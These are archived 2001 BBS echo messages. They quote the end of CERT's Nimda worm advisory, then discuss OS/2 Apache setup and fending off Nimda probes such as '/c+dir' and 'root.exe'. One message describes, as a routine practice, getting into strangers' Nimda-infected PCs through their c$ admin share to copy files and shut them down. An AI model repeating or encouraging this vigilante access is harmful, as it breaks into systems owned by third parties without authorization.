    Note: IE 5.5 SP1 users should apply the patches discussed in MS01-027


    Run and Maintain an Anti-Virus Product

    It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A.

    Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.


    Don't open e-mail attachments

    The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.


    Disable JavaScript

    End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable JavaScript until all appropriate patches have been applied and anti-virus software has been updated.


    Appendix A. Vendor Information

    Antivirus Vendor Information

    Aladdin Knowledge Systems
    http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087

    Central Command, Inc.
    http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?
    p_refno=010918-000005

    Command Software Systems
    http://www.commandsoftware.com/virus/nimda.html

    Computer Associates
    http://www.ca.com/virusinfo/encyclopedia/descriptions/n/nimda.htm

    F-Secure Corp
    http://www.fsecure.com/v-descs/nimda.shtml

    McAfee
    http://vil.mcafee.com/dispVirus.asp?virus_k=99209&

    Panda Software
    http://service.pandasoftware.es/library/card.jsp?Virus=Nimda

    Proland Software
    http://www.pspl.com/virus_info/worms/nimda.htm

    Sophos
    http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

    Symantec
    http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

    Trend Micro
    http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
    http://www.antivirus.com/pc-cillin/vin fo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A


    References

    You may wish to visit the CERT/CC's computer virus resources page located at

    http://www.cert.org/other_sources/viruses.html

    Feedback on this document may be directed to the authors, Roman Danyliw, Chad Dougherty, Allen Householder, Robin Ruefle.

    This document is available from:
    http://www.cert.org/advisories/CA-2001-26.html


    CERT/CC Contact Information

    Email: cert@cert.org
    Phone: +1 412-268-7090 (24-hour hotline)
    Fax: +1 412-268-6989
    Postal address:
    CERT Coordination Center
    Software Engineering Institute
    Carnegie Mellon University
    Pittsburgh PA 15213-3890
    U.S.A.

    CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday
    through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.


    Using encryption

    We strongly urge you to encrypt sensitive information sent by email. Our public
    PGP key is available from

    http://www.cert.org/CERT_PGP.key

    If you prefer to use DES, please call the CERT hotline for more information.


    Getting security information

    CERT publications and other security information are available from our web site

    http://www.cert.org/

    To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

    subscribe cert-advisory

    * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.


    NO WARRANTY
    Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.


    Conditions for use, disclaimers, and sponsorship information

    http://www.cert.org/leagl_stuff.html


    Copyright 2001 Carnegie Mellon University.


    Revision History

    September 18, 2001: Initial Release
    September 19, 2001: Updated link to MS advisory MS01-027
    September 19, 2001: Updated antivirus vendor information,
    updated e-mail propagation description,
    added reference to second related IIS vul
    September 20, 2001: Added link to Computer Associates in
    vendor information,
    Updated overview, payload, file system
    propagation, and recommendations for
    system administrator sections
    September 20, 2001: Fix link to CA-2001-12 in payload section
    September 21, 2001: Added recommendations for network
    administrators,
    updated payload section,
    updated vendor information clarified
    recommendations for end user systems
    September 25, 2001: Qualified note concerning MS01-027

    ===== end quoting http://www.cert.org/advisories/CA-2001-26.html =====

    )\/(ark


    * Origin: (1:3634/12)
  • From mark lewis@1:3634/12 to Mike Luther on Sat Nov 3 04:39:28 2001
    patching process... in a few cases, i've even called
    them on the phone and talked to them directly telling
    them who i was, what i was doing, and why... you
    should hear some of their comments when i tell them
    certain steps (like placing a file in a certain place
    and they see it pop into existance via drag and drop
    from my desktop! or when i send the shutdown command)
    that i'm doing... there are times that i really wish
    that i could see and capture their facial
    expressions...

    Sorry for my twisted humor personality, but you remember back
    when I think it was Jack Lemmon played the Devil, had turned
    this poor soul into a parrot? He didn't like it's looks, so
    he wrenched the beak around qrotesquely, looked at it with a
    tilted head like a parrot does, and then commented out of the
    side of his mouth, "Definitely Piccasso!" ;)

    yup!! i don't exactly remember the "skit" but the statement is rightous!

    [trim]

    I can reason this load-linee out mentally..

    yup, seems so...

    or whatever... i guess it may also help that that box
    runs quite a few tasks all the time... from a clean
    boot, CTRL-ESC shows twenty-three (23) tasks running
    and those are running all the time as that machine's
    server ops that i employ here...

    But in this case, we're dealing with a problem, I think, at
    core level in the Kernel that sneaked in here at W40508 level.

    ok... i don't know if you are aware of it or if i've stated it during these exchanges, my system is warp 3 connect w/fp40 only... nothing else applied... the default warp 3 connect tcp/ip and mpts unless something in fp40 changed something in them...

    It wasn't there for the original level of FP 15. Showed up
    when I upgraded the Kernel only. I didn't get it caught in
    time and figured out to report it in Testcase officially. In
    the couple of months it took me isolate a trap like this that
    doesn't even trap the box and leaves no way to trace it,
    things went far forward from W40508. Plus, who in heck wants
    to work with the Adaptec 1542C level cards which is the only
    place I see it? As well, I'm not at all sure the Kernel is
    really even the cause, as I've sorta now pinned it on the
    SYSTEM checking CANARY deal from Norman in conjunction with
    this.

    errrhummmmm... CANARY?? i understand that norman is a virus scanner, correct?

    To date Norman hasn't even answered the support help
    request... ;(

    oh, doesn't that leave warm fuzzies <<SIGH>>

    I'm cable hosted. ....

    uuugh... that does toss in a bit of a sticky wicket,
    eh? hummm... maybe you can run some sort of monitor
    that checks that tcp/ip is up and operational before
    apache is launched... you don't think it could be an
    EMX thing failing, do you? what level are you at with
    EMX and are you using the runtime only or the
    development??

    I'm at current level 4.09 as I recall.

    4.09 which one? hehehe... j/k... though there are fixes out for 4.09... i think
    that i may be short one (ie: on fix3 and fix4 is out)...

    It reports, I think,
    61 in the version dump screen. I'm also using the full
    development game, but really don't need that for this box.
    It's just easier to set up and dump in a common format for
    stuff like this everywhere than do this on one box and that on
    another.

    ok... i, too, use the full development stuff for pretty much the same reason...
    that and because i get curious at times and attempt to code me something in it <<GG>>

    Thanks,

    This one showed up directly here on OS2INET by the way.

    ok... your replies have all been coming back on OS2DOSBBS, though... yes, all my messages in this run are also in OS2DOSBBS... i didn't want to loose or confuse you any more than may already be... i'd rather get the info out to you and then get the other stuff straight... in any case, give your configs a going
    over or whatever and let's see if we can figure out why your replies are crossing over (no, not the john edward way) to OS2DOSBBS when they are being written in the proper area...

    oh hey! could it be that maybe the storage files for those two areas is crosslinked on disk somehow??

    )\/(ark (watching for test in OS2INET to arrive in OS2INET)


    * Origin: (1:3634/12)
  • From mark lewis@1:3634/12 to Mike Luther on Sat Nov 3 04:28:26 2001
    [picking up from last message]

    right?

    yes, pretty much... i think i'd trap on
    "/path/root.exe" and each of the others... in
    otherwords, just shorten it enough to get just that
    stuff without having to parse too much... it really
    should be enough to let apache handle it but it is
    possible that one may see 1000+ hits per second from
    NIMDAs all over the first two ip octets you're in...

    I think I know enough to begin writing here... Trying to
    triage all this into what is most proactical (I'll leave you
    to figure out about four terrible pun relationships in that
    coineed word!) at this point!

    hehehe, yes, i know what you mean but i'm not sure i got the puns <<GG>>

    as far as the nimda attack stuff, see my next message... it is the CERT advisory on NIMDA... this does not include the new NIMDA.E variant that is using two additional attack URL "vectors"...

    yes, that should work... hopefully ijfire won't get
    bogged down trying to handle the possible high numbers
    of hits or even get taken out, itself...

    I've read into that this can happen but hav no information on
    what the chances are based on this level of attack rates.

    i believe that it is (even) possible for a router or firewall to become a bottleneck if they are using a lot of filters and/or having to filter a lot of traffic... imagine 10 NIMDA infected machines in the same 192.168.xx.xx address
    range as you are... those machine fire off their 16 URL requests at the same time... that's 160 requests at once that your machine will have to handle... now, say that each NIMDA'd machine also hits you with each request 500 times...
    now we're looking at 80000 hits that something has to handle... on my stuff here, i've seen 500 hits logged over a few minutes (ie: one or two IIRC)... that can be a major amount of traffic for something to have to work with...

    ok... i'll add that address to my abuse addresses list... don't know
    that i'll need it unless i get hit from there during
    one/some of the random ip number generation attacks
    that nimda uses... in many cases, i've been able to
    hop over to one of the windows boxes, here, and smack
    that attacking machine right off the entire network...

    How delicate!

    hehe, the first time i did it and it worked as was described to me, i was extatic<sp?>... after that, it became almost routine... do this, do that, open this, drag that over here and drop it over there, send the signal, watch the machine disappear from the 'net... after doing that some 100+ times, it's become almost rote and burnout boring... the problem that "we" face now is that
    many of those NIMDA'd boxes have had windows security settings adjusted such that one doesn't have security rights to access some of the needed items to be able to get in and shut the machine down... but the box is still infected and attacking... and when one is dealing with dialups and, i guess, cable/dsl feeds, it can become quite a chore for anyone to figure out what box is infected... the number of systems that have frontpage installed and subsequently personal web server or IIS and the users don't even know is abominal... such is the life that m$ wants to create... a world of sheeple... hummm, that sounds almost talibanish...

    ['nother trim for length <<GG>>]

    )\/(ark


    * Origin: (1:3634/12)
  • From mark lewis@1:3634/12 to Mike Luther on Sat Nov 3 04:10:00 2001
    uuuggghhh... and here i sit behind injoy v2.0b with
    nothing else between that box and the net... have that
    apache/2 1.3.22 server running and a couple of
    aliasmatch statements in httpd.conf to at least send
    something i want to send back... in fact, my stuff has
    a bit more output than many because i fully expect
    that some stuff may be being sent manually by a person
    attempting to hack in themselves...

    Interesting.

    what's interesting? the part about me just using injoy v2.0b or the part about manually keying those URLs?

    FWIW: it is the manual keying of those URLs that allows one to begin to "counter-attack"... if on of those /c+dir commands returns a directory listing,
    then the system security is compromised enough to get a start at beating the nasty down... but it does require the use of other tools and accessing the system via additional means... on a windows box, start->run and entering

    \\ip.number.of.machine\c$

    will gain you access to the compromised system's c$ share... one can also do the same for the \ipc$ share... this only works if that security stuff is compromised like the webserver's security has been... once one can access the \c$ (or whatever$) on a windows box, it's all GUI from there, pretty much... one can drag'n'drop anything from either machine to anywhere else... hehe, a "funny" i did one time was to copy files that i had created from one compromised box to another compromised box... i did that only just to see if it
    would work... i highly suspected it would and was rewarded for my efforts <<GG>>

    here's those aliasmatch statements...

    Snipped for bandwidth but put into the keep and learn how to
    do this!

    you might also find this one useful...

    Ditto.

    you're welcome <<GG>>

    RedirectMatch (.*).ico$ http://www.microsoft.com$1.ico

    # That one liner above will redirect all ".ico" request from
    # your server to the Microsoft server. Now you'll be letting
    # their damm server deal with the errors and bandwidth. It
    # will NOT interupt your traffic at all! If MS is going to
    # request files from your server, it's only appropriate that
    # they deal with the problems they cause...

    Mmm . Mint Cookies, saved in notebook! Gee how little I know,
    And I never really wanted to .. oh well. Such is life! ;)

    hehehe, i know that feeling... the more i dig into the webserver stuff, especially apache, the more i want to try to create a bbs loadable module for it... however, i don't have the time or the drive (sadly) as i once did... not to mention that after 20+ years of being involved in the computer industry, i'm
    in the process of a major career change... seems that driving a tractor-trailer
    rig can net me more than double anything i've made working in the industry all these years and with a whole lot less stress... i just hope that boredom doesn't set in as it has with computers and lead to a burnout situation like i've had to deal with over the last few years... one can only answer the same question so many times before one explodes...

    [chomping here to carry rest to another message due to the length that some of these have been getting to. it's a human thing rather than a technical thing <<GG>>]

    )\/(ark


    * Origin: (1:3634/12)